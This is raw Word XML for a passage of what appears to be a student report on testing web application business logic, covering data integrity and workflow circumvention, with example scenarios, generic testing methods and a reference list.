      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="418EF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student’s financial information, even making expenses on their behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="026D0C8D" w:rsidP="7CC6EB9B" w:rsidRDefault="026D0C8D" w14:paraId="35F70F00" w14:textId="25554402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026D0C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Testing Method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="026D0C8D" w:rsidP="7CC6EB9B" w:rsidRDefault="026D0C8D" w14:paraId="2185A1F0" w14:textId="009EFCF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026D0C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test this example, one could use a proxy capture tool, and search for places where information co</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2A742B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uld be inserted into fields that should not be edited, using HTTP traffic.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Upon finding the field, all the tester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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4DDF1E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7CC6EB9B" w:rsidR="4AA4B6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that would normally be restricted (In this case Financials, Personal Information, Student Criminal Record, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7AC76D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etc.) to see if they can “break” the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AC76D79" w:rsidP="7CC6EB9B" w:rsidRDefault="7AC76D79" w14:paraId="2AD7F12A" w14:textId="15C4E48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7AC76D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Example 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AC76D79" w:rsidP="7CC6EB9B" w:rsidRDefault="7AC76D79" w14:paraId="3AE94E1A" w14:textId="4D0A9D4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4BBA09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Let us imagine that a business company is in the process of hiring new employees. To complete this process, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B0C7B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they will need to obtain their personal information, some of which can be quite sensitive. Initially, the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69B160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application </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69B160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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69B160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only available to download on a smartphone, to keep all activities between only people associated with the company. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="172C1B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However, one day, the board of directors decides to make this a web application as well, so that employees can </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="172C1B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modif</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="55D100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</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="55D100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any information accessible to them (ex. Name, address) from the comfort of their home. Since the application is now freely available on the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1A5849B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internet, anyone with a proxy </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="654629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could access and </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="654629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modify</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="654629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restricted information. In addition to the fact that they can use a sensitive piece of information, such as a Social Security Number, to c</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="113B7DB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ommit </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="113B7DB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identify</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="113B7DB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theft, they can also “break” the app by supplying data that </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76F486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shouldn’t</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76F486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there. For example, in the case of an employee with no </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76F486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previous</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="76F486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work experience, they may enter an address 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name for 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previous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workplace. This will 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likely cause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program to crash, leading to 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serious consequences</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5646F9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the com</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2FB707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pany.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FB707A5" w:rsidP="7CC6EB9B" w:rsidRDefault="2FB707A5" w14:paraId="4F87C08F" w14:textId="4DF3A0F6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7CC6EB9B" w:rsidR="2FB707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Testing Method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FB707A5" w:rsidP="7CC6EB9B" w:rsidRDefault="2FB707A5" w14:paraId="00105D2B" w14:textId="4B26A22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CC6EB9B" w:rsidR="2FB707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very simple test for this example is to check the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38C59A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entire application for modifiable components. A tester should try to enter data that is not supposed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="38C59A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there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or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enter input that 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longer than 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they</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5ED88A7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should be. For example, as in the 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case above, they could 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enter data for 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previous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workplace after having selected “No” to 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previous</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2FA8CE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work experience, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0918DCE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 they could try to enter a 15-digit phone number. If the application allows it, they hav</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74B44A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discovered an integrity </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74B44A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vul</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74B44A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nerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="74B44A20" w:rsidP="7CC6EB9B" w:rsidRDefault="74B44A20" w14:paraId="3C0F8BD9" w14:textId="3B649D41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7CC6EB9B" w:rsidR="74B44A2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Test Defenses Against Circumvention of </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74B44A2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Work Flows</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="74B44A2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(OTG-BUSLOGIC</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0662A74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—006)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0662A745" w:rsidP="7CC6EB9B" w:rsidRDefault="0662A745" w14:paraId="1A6C504B" w14:textId="0BC35EC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CC6EB9B" w:rsidR="50F90B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According to O’Reilly Media, programs such as shoppin</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3C9478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 applications, “must be tested by web app penetration testers to ensure the workflow cannot be performed out of sequence.” (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="542539C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n.d.). Users must always ensure that any purchases have been confirmed o</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="24F57D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n the server side. If that is not the case, attackers could very easily </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="24F57D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modify</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="24F57DE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purchase and customer information</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0CE7BA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(O’Reilly Media, n.d.). Below, two examples of workflow circum</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6A00F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vention are presented, along with testing methods that can be used for them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A3607A" w:rsidP="7CC6EB9B" w:rsidRDefault="35A3607A" w14:paraId="4A30FE0F" w14:textId="7414EBF0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7CC6EB9B" w:rsidR="35A3607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Example 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A3607A" w:rsidP="7CC6EB9B" w:rsidRDefault="35A3607A" w14:paraId="08C1409A" w14:textId="509692E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CC6EB9B" w:rsidR="7A6C10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Let us imagine an electronic discussion page for students</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1B9DCF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which is part of a</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3986EE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timed</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1B9DCFC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exercise where students must </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0C1A6D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spell words correctly from </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0C1A6D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memory, and</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0C1A6D6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are only allowed one</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B12F9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attempt. A student may open a second tab to look up the answers, or </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B12F9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submit</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2B12F9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and then </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="27D89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edit their </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="27D89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initial</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="27D89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answer. Obviously, the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="27D89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option</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="27D891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edit should not be available in this sort of exercise. However, developers mu</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3CC1563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st also find a way to ensure that a student cannot open any other </w:t>
      </w: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tabs until the timer runs out.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="797C980D" w:rsidP="7CC6EB9B" w:rsidRDefault="797C980D" w14:paraId="426926D5" w14:textId="21291D08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Testing Method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="797C980D" w:rsidP="7CC6EB9B" w:rsidRDefault="797C980D" w14:paraId="66E900CB" w14:textId="65571FD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A tester could handle this by </w:t>
      </w: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submitting</w:t>
      </w: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their </w:t>
      </w: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initial</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="797C98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ans</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="25A68D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wer, and then coming back to edit it. They should also </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="25A68D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attempt</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="25A68DD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open multiple tabs while completing the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="137B2EEF" w:rsidP="7CC6EB9B" w:rsidRDefault="137B2EEF" w14:paraId="1AAFEC18" w14:textId="087D9F0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7CC6EB9B" w:rsidR="137B2E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Example 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="137B2EEF" w:rsidP="7CC6EB9B" w:rsidRDefault="137B2EEF" w14:paraId="02517C41" w14:textId="08F6882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CC6EB9B" w:rsidR="137B2EE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Picture a shopping application where a 30% discount is applied if the total purchase price </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="634A3F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reaches $450. If the discount is applied before checkout is completed</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4903481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(ex. Once the items are in the basket)</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="634A3F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7CC6EB9B" w:rsidR="429CB1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a user may take advantage of the opportunity, and </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="1C0CC0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simply remove some of the items before checking out, yet still obtain the 30% discount. To avoid this, developers must make</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="2EBC511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sure that discounts are applied only after checkout is completed, and the “Finish” button is p</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="5EDF07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ressed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EDF07CE" w:rsidP="7CC6EB9B" w:rsidRDefault="5EDF07CE" w14:paraId="1BD77E99" w14:textId="395BE6B9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7CC6EB9B" w:rsidR="5EDF07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Testing Method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EDF07CE" w:rsidP="7CC6EB9B" w:rsidRDefault="5EDF07CE" w14:paraId="1381EADE" w14:textId="39D4E8E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CC6EB9B" w:rsidR="5EDF07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Here, the tester must, quite simply, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B588E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initialize a purchase with enough items to exceed the $450 price. Once </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B588E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they</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0B588E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items are in th</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="4FDFD78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 basket, and a 30% discount is applied, they should remove some of them, and lower the price to below $450, to see if the discount </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="023BC2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will also be removed. If this does not happen, they have discovered a </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="023BC2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serious vulnerab</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="023BC21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ility.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="64B481AB" w14:textId="6C54796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02B35043" w14:textId="72B4DAF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0275738C" w14:textId="676C3C9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30C30C7E" w14:textId="6EBC390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63A5C1F8" w14:textId="4850F41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16E99349" w14:textId="039F7EB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667D4E52" w14:textId="63FBEF5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DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="22E8D039" w14:textId="2EFC3E63">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1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6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="13421FAE" w14:textId="50D6B247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Burp suite cookbook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O’Reilly Online Learning. </w:t>
      </w:r>
      <w:hyperlink r:id="Rb9e93f1b5f944938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https://www.oreilly.com/library/view/burp-suite-cookbook/9781789531732/a2635912-e2fb-4ad1-848e-75340e5be2cb.xhtml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="3788A24E" w14:textId="5F5DDC4C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integrity testing in software testing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(2023, September 21).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GeeksforGeeks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f6736b44755640e5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https://www.geeksforgeeks.org/data-integrity-testing-in-software-testing/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="547BCA02" w14:textId="3B295856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to use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Java?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(2022, September 13).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GeeksforGeeks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b606ddca3b0d4d9e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https://www.geeksforgeeks.org/how-to-use-preparedstatement-in-java/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="233A2DA4" w14:textId="3A49A1DB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Moradov, O. (2022, January 24).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Stored XSS: Impact, Examples, and Prevention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BrightSec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May 5, 2024, from </w:t>
      </w:r>
      <w:hyperlink r:id="Re7b13e959ec1490f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https://brightsec.com/blog/stored-xss/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="23C7C1A8" w14:textId="1993AC70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OWASP Testing Guide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(4.0). (2011). Open Web Application Security Project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="3725C918" w14:textId="401F5756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Understanding stored XSS in depth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(2021, July 14).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GeeksforGeeks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May 5, 2024, from </w:t>
      </w:r>
      <w:hyperlink r:id="R183afc9c9cda4f82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https://www.geeksforgeeks.org/understanding-stored-xss-in-depth/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6DD72F55" w:rsidP="7CC6EB9B" w:rsidRDefault="6DD72F55" w14:paraId="4D8DF6CB" w14:textId="49847053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C6EB9B" w:rsidR="6DD72F5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reflected XSS (cross-site scripting)? Tutorial &amp; examples | Web security Academy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Web Application Security, Testing, &amp; Scanning - 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PortSwigger</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6DD72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af23b4e7e09343fe">
        <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6DD72F5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https://portswigger.net/web-security/cross-site-scripting/reflected</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="423068BC" w14:textId="4E80D63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CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="629E32E5" w14:textId="600FC54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fbeb16025814aa5"/>
      <w:footerReference w:type="default" r:id="Ra6c360f8444b45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6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="53A4E548">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="4CA8F500" w14:textId="35B3D5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C6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="704019B4" w14:textId="66F20E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C6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="455D0868" w14:textId="5CF98114">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="37711FEE" w14:textId="307C90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6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="70C2D6B0">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="6BDA2F55" w14:textId="7D155F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C6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="69EDCD68" w14:textId="66A545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C6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="68CB0D72" w14:textId="65DBCDE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CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="2531C421" w14:textId="109DEBD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1LnaKezwqRt/n" int2:id="U0DVR4kW">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="h87lTJM4ooVDM9" int2:id="k2QX6Ql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f2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452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760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69a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1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407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2E6F7"/>
    <w:rsid w:val="000EDFCB"/>
    <w:rsid w:val="002A44C5"/>
    <w:rsid w:val="0031ABE9"/>
    <w:rsid w:val="0049E6DC"/>
    <w:rsid w:val="0053B053"/>
    <w:rsid w:val="00551BB1"/>
    <w:rsid w:val="008FD1B2"/>
    <w:rsid w:val="00A4F63D"/>
    <w:rsid w:val="00A8F7AC"/>
    <w:rsid w:val="00AC5529"/>
    <w:rsid w:val="00B07149"/>
    <w:rsid w:val="00D573E1"/>
    <w:rsid w:val="00F330E3"/>
    <w:rsid w:val="01120696"/>
    <w:rsid w:val="011934EF"/>
    <w:rsid w:val="0133757D"/>
    <w:rsid w:val="017309E8"/>
    <w:rsid w:val="0174F18C"/>
    <w:rsid w:val="018080A0"/>
    <w:rsid w:val="01CF60B8"/>
    <w:rsid w:val="01EFE327"/>
    <w:rsid w:val="01F68D6A"/>
    <w:rsid w:val="020D1D06"/>
    <w:rsid w:val="020D6A17"/>
    <w:rsid w:val="023BC217"/>
    <w:rsid w:val="0244C80D"/>
    <w:rsid w:val="024A77D7"/>
    <w:rsid w:val="026D0C8D"/>
    <w:rsid w:val="029C1616"/>
    <w:rsid w:val="02A112A2"/>
    <w:rsid w:val="02FFE730"/>
    <w:rsid w:val="030CB759"/>
    <w:rsid w:val="03327FE9"/>
    <w:rsid w:val="03631A23"/>
    <w:rsid w:val="03694CAB"/>
    <w:rsid w:val="036DACEC"/>
    <w:rsid w:val="039587EB"/>
    <w:rsid w:val="03A398A2"/>
    <w:rsid w:val="03ABDB22"/>
    <w:rsid w:val="03AC5B09"/>
    <w:rsid w:val="03CC47F6"/>
    <w:rsid w:val="03CF5C0C"/>
    <w:rsid w:val="03D2F188"/>
    <w:rsid w:val="041D48EE"/>
    <w:rsid w:val="0421E643"/>
    <w:rsid w:val="043B680B"/>
    <w:rsid w:val="045A4B4C"/>
    <w:rsid w:val="0460A9AF"/>
    <w:rsid w:val="04623F13"/>
    <w:rsid w:val="04700FAA"/>
    <w:rsid w:val="04822F4A"/>
    <w:rsid w:val="048B2F17"/>
    <w:rsid w:val="04CFAB34"/>
    <w:rsid w:val="04DE92AD"/>
    <w:rsid w:val="04EE37F1"/>
    <w:rsid w:val="0524BF79"/>
    <w:rsid w:val="0534EC23"/>
    <w:rsid w:val="053F6903"/>
    <w:rsid w:val="05837452"/>
    <w:rsid w:val="0583F6F5"/>
    <w:rsid w:val="05A0F77E"/>
    <w:rsid w:val="05AB5A79"/>
    <w:rsid w:val="05EA1E09"/>
    <w:rsid w:val="05F75C37"/>
    <w:rsid w:val="06026021"/>
    <w:rsid w:val="0610B07D"/>
    <w:rsid w:val="065045A0"/>
    <w:rsid w:val="06569A8C"/>
    <w:rsid w:val="065DE295"/>
    <w:rsid w:val="0662A745"/>
    <w:rsid w:val="066B7B95"/>
    <w:rsid w:val="06A12A6F"/>
    <w:rsid w:val="06B2FC6F"/>
    <w:rsid w:val="06C115E6"/>
    <w:rsid w:val="06CD5A54"/>
    <w:rsid w:val="06D7E2DC"/>
    <w:rsid w:val="06E34E28"/>
    <w:rsid w:val="06E3FBCB"/>
    <w:rsid w:val="06E9A0FD"/>
    <w:rsid w:val="06F268C6"/>
    <w:rsid w:val="06F5BB7B"/>
    <w:rsid w:val="06F7ACA2"/>
    <w:rsid w:val="06FA305E"/>
    <w:rsid w:val="06FE5C88"/>
    <w:rsid w:val="070B3078"/>
    <w:rsid w:val="071707AD"/>
    <w:rsid w:val="07398D7F"/>
    <w:rsid w:val="077FEDCE"/>
    <w:rsid w:val="079D4B6D"/>
    <w:rsid w:val="07A41F4C"/>
    <w:rsid w:val="07A87D0B"/>
    <w:rsid w:val="07D4D955"/>
    <w:rsid w:val="07E495AC"/>
    <w:rsid w:val="07ED205C"/>
    <w:rsid w:val="08176275"/>
    <w:rsid w:val="083D572C"/>
    <w:rsid w:val="08451FA8"/>
    <w:rsid w:val="085DA464"/>
    <w:rsid w:val="086C12B2"/>
    <w:rsid w:val="087FCC2C"/>
    <w:rsid w:val="08953BBF"/>
    <w:rsid w:val="089EF249"/>
    <w:rsid w:val="08C7168F"/>
    <w:rsid w:val="08DA7E99"/>
    <w:rsid w:val="08FB42D7"/>
    <w:rsid w:val="0914B798"/>
    <w:rsid w:val="0918DCE2"/>
    <w:rsid w:val="0932CB58"/>
    <w:rsid w:val="0949588D"/>
    <w:rsid w:val="094A7AFF"/>
    <w:rsid w:val="095154EA"/>
    <w:rsid w:val="09904DE9"/>
    <w:rsid w:val="0999D8A3"/>
    <w:rsid w:val="09A0F34D"/>
    <w:rsid w:val="09A6304C"/>
    <w:rsid w:val="09CEA920"/>
    <w:rsid w:val="09F8B6A8"/>
    <w:rsid w:val="0A0B8FAB"/>
    <w:rsid w:val="0A241FF1"/>
    <w:rsid w:val="0A2BA847"/>
    <w:rsid w:val="0A31CFDC"/>
    <w:rsid w:val="0A3DDD4D"/>
    <w:rsid w:val="0A46B27C"/>
    <w:rsid w:val="0A9A7B9E"/>
    <w:rsid w:val="0ADE4949"/>
    <w:rsid w:val="0AF62776"/>
    <w:rsid w:val="0B0B3B38"/>
    <w:rsid w:val="0B0E268A"/>
    <w:rsid w:val="0B2C7251"/>
    <w:rsid w:val="0B550ABF"/>
    <w:rsid w:val="0B588E18"/>
    <w:rsid w:val="0B7A6E1D"/>
    <w:rsid w:val="0B832A3D"/>
    <w:rsid w:val="0B914607"/>
    <w:rsid w:val="0B948709"/>
    <w:rsid w:val="0B9BBB56"/>
    <w:rsid w:val="0B9E2E88"/>
    <w:rsid w:val="0BA2B53D"/>
    <w:rsid w:val="0BA42DA7"/>
    <w:rsid w:val="0BB6980D"/>
    <w:rsid w:val="0BB76CEE"/>
    <w:rsid w:val="0C03E02E"/>
    <w:rsid w:val="0C14AA3D"/>
    <w:rsid w:val="0C1A6D61"/>
    <w:rsid w:val="0C341926"/>
    <w:rsid w:val="0C575B00"/>
    <w:rsid w:val="0C920784"/>
    <w:rsid w:val="0CB81F1E"/>
    <w:rsid w:val="0CC2BDE1"/>
    <w:rsid w:val="0CCB4E86"/>
    <w:rsid w:val="0CDABD19"/>
    <w:rsid w:val="0CE7BABC"/>
    <w:rsid w:val="0CE8A85C"/>
    <w:rsid w:val="0D148EF1"/>
    <w:rsid w:val="0D394011"/>
    <w:rsid w:val="0D3B8C3F"/>
    <w:rsid w:val="0D4A20AC"/>
    <w:rsid w:val="0D4D81AF"/>
    <w:rsid w:val="0D5A1115"/>
    <w:rsid w:val="0D5BC0B3"/>
    <w:rsid w:val="0D68ACE2"/>
    <w:rsid w:val="0D758C58"/>
    <w:rsid w:val="0D81005E"/>
    <w:rsid w:val="0D87C7EC"/>
    <w:rsid w:val="0D88E0CF"/>
    <w:rsid w:val="0DBC968F"/>
    <w:rsid w:val="0DFB5EAE"/>
    <w:rsid w:val="0DFB7C66"/>
    <w:rsid w:val="0E007B98"/>
    <w:rsid w:val="0E12385E"/>
    <w:rsid w:val="0E400E2B"/>
    <w:rsid w:val="0E532A54"/>
    <w:rsid w:val="0E539144"/>
    <w:rsid w:val="0E5FF4C9"/>
    <w:rsid w:val="0E671EE7"/>
    <w:rsid w:val="0E6B3B30"/>
    <w:rsid w:val="0E779A6E"/>
    <w:rsid w:val="0E9FF3F0"/>
    <w:rsid w:val="0EA1DF86"/>
    <w:rsid w:val="0EA27FC4"/>
    <w:rsid w:val="0EAC85B4"/>
    <w:rsid w:val="0EB59CA3"/>
    <w:rsid w:val="0ED75CA0"/>
    <w:rsid w:val="0EE5F10D"/>
    <w:rsid w:val="0EE95210"/>
    <w:rsid w:val="0EEB2D0E"/>
    <w:rsid w:val="0EEEB6B2"/>
    <w:rsid w:val="0EF12D40"/>
    <w:rsid w:val="0EF5E176"/>
    <w:rsid w:val="0F270162"/>
    <w:rsid w:val="0F2A2FEE"/>
    <w:rsid w:val="0F7990F7"/>
    <w:rsid w:val="0F974CC7"/>
    <w:rsid w:val="0FA2E468"/>
    <w:rsid w:val="0FB33A80"/>
    <w:rsid w:val="0FC9A846"/>
    <w:rsid w:val="0FD7B527"/>
    <w:rsid w:val="0FEF7DCF"/>
    <w:rsid w:val="1002EF48"/>
    <w:rsid w:val="101041E6"/>
    <w:rsid w:val="101E0BEB"/>
    <w:rsid w:val="102EF419"/>
    <w:rsid w:val="10485615"/>
    <w:rsid w:val="1070E0D3"/>
    <w:rsid w:val="1082BEB5"/>
    <w:rsid w:val="1092D93C"/>
    <w:rsid w:val="109AE9CB"/>
    <w:rsid w:val="10A04DA4"/>
    <w:rsid w:val="10A27C89"/>
    <w:rsid w:val="10B8A120"/>
    <w:rsid w:val="10D43913"/>
    <w:rsid w:val="10DFD96F"/>
    <w:rsid w:val="10E75868"/>
    <w:rsid w:val="110DD19D"/>
    <w:rsid w:val="112BDEFF"/>
    <w:rsid w:val="113B7DB9"/>
    <w:rsid w:val="1164A3C6"/>
    <w:rsid w:val="116568FA"/>
    <w:rsid w:val="11699A56"/>
    <w:rsid w:val="117B5860"/>
    <w:rsid w:val="118F23A0"/>
    <w:rsid w:val="1193A519"/>
    <w:rsid w:val="11A2DBF2"/>
    <w:rsid w:val="11B56AB4"/>
    <w:rsid w:val="11B5A5BD"/>
    <w:rsid w:val="11C28889"/>
    <w:rsid w:val="11FA6413"/>
    <w:rsid w:val="11FC9DCC"/>
    <w:rsid w:val="122F0836"/>
    <w:rsid w:val="12422BE5"/>
    <w:rsid w:val="1247B409"/>
    <w:rsid w:val="127E0E06"/>
    <w:rsid w:val="128EC430"/>
    <w:rsid w:val="129C576D"/>
    <w:rsid w:val="12E95B2E"/>
    <w:rsid w:val="1323700C"/>
    <w:rsid w:val="132AF401"/>
    <w:rsid w:val="132C0CC1"/>
    <w:rsid w:val="137B2EEF"/>
    <w:rsid w:val="139A1CCA"/>
    <w:rsid w:val="13DC3E14"/>
    <w:rsid w:val="13E5C4A6"/>
    <w:rsid w:val="140AE54C"/>
    <w:rsid w:val="141EF92A"/>
    <w:rsid w:val="142CC7F1"/>
    <w:rsid w:val="145D987A"/>
    <w:rsid w:val="14678C24"/>
    <w:rsid w:val="146A2983"/>
    <w:rsid w:val="14713B2A"/>
    <w:rsid w:val="148179E2"/>
    <w:rsid w:val="14ABABCC"/>
    <w:rsid w:val="14B28E0C"/>
    <w:rsid w:val="14C9E3E2"/>
